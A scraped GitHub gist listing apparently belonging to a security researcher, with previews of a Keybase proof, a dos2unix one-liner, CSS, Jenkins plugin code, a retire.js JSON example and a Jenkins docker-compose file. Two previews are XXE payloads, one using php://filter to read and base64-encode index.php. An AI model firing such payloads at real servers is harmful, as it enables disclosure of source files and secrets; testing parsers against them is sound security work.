Skip to content

Instantly share code, notes, and snippets.

<!ENTITY all '%start;%hax;%end;'>
Hiver au Québec
https://www.dailymotion.com/video/x19cn6e
Reportage en france
https://www.tf1.fr/tmc/quotidien-avec-yann-barthes/videos/20h-medias-neige-france-ca-fait-mourir-de-rire-russie-pologne-surtout-quebec.html
@h3xstream
h3xstream / keybase.md
Created January 7, 2019 19:57
Keybase test

Keybase proof

I hereby claim:

  • I am h3xstream on github.
  • I am h3xstream (https://keybase.io/h3xstream) on keybase.
  • I have a public key ASB0IkMjZ_ARILTQlx4hZhlbbHN72vmBUpp2PjnGtiCIggo

To claim this, I am signing this object:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php" >
]>
<feed>
<title>test</title>
<description>test</description>
<entry>
<title>Test</title>
@h3xstream
h3xstream / dos2unix.sh
Created August 21, 2018 23:29
dos2unix equivalent
sed -i 's/\r//' FILE_NAME
pre > code.highlight {
border-bottom: 3px dashed red;
}
.fa-exclamation-triangle {
color: red;
}
.analysis-warning {
@h3xstream
h3xstream / SourceDetail.java
Created August 11, 2018 04:32
SourceDetail with prism.js
package hudson.plugins.analysis.views;
import java.io.*;
import java.util.ArrayList;
import java.util.List;
import java.util.NoSuchElementException;
import org.apache.commons.io.FilenameUtils;
import org.apache.commons.io.IOUtils;
import org.apache.commons.io.LineIterator;
{
"retire-example": {
"vulnerabilities" : [
{
"below" : "0.0.2",
"severity" : "low",
"identifiers" : {
"CVE" : [ "CVE-XXXX-XXXX" ],
"bug" : "1234",
"summary" : "bug summary"
@h3xstream
h3xstream / docker-compose.yml
Created April 18, 2018 15:19
Jenkins Docker-Compose
version: "2"
services:
#
jenkins1:
image: jenkins
container_name: jenkins1
ports:
- 8080:8080
volumes: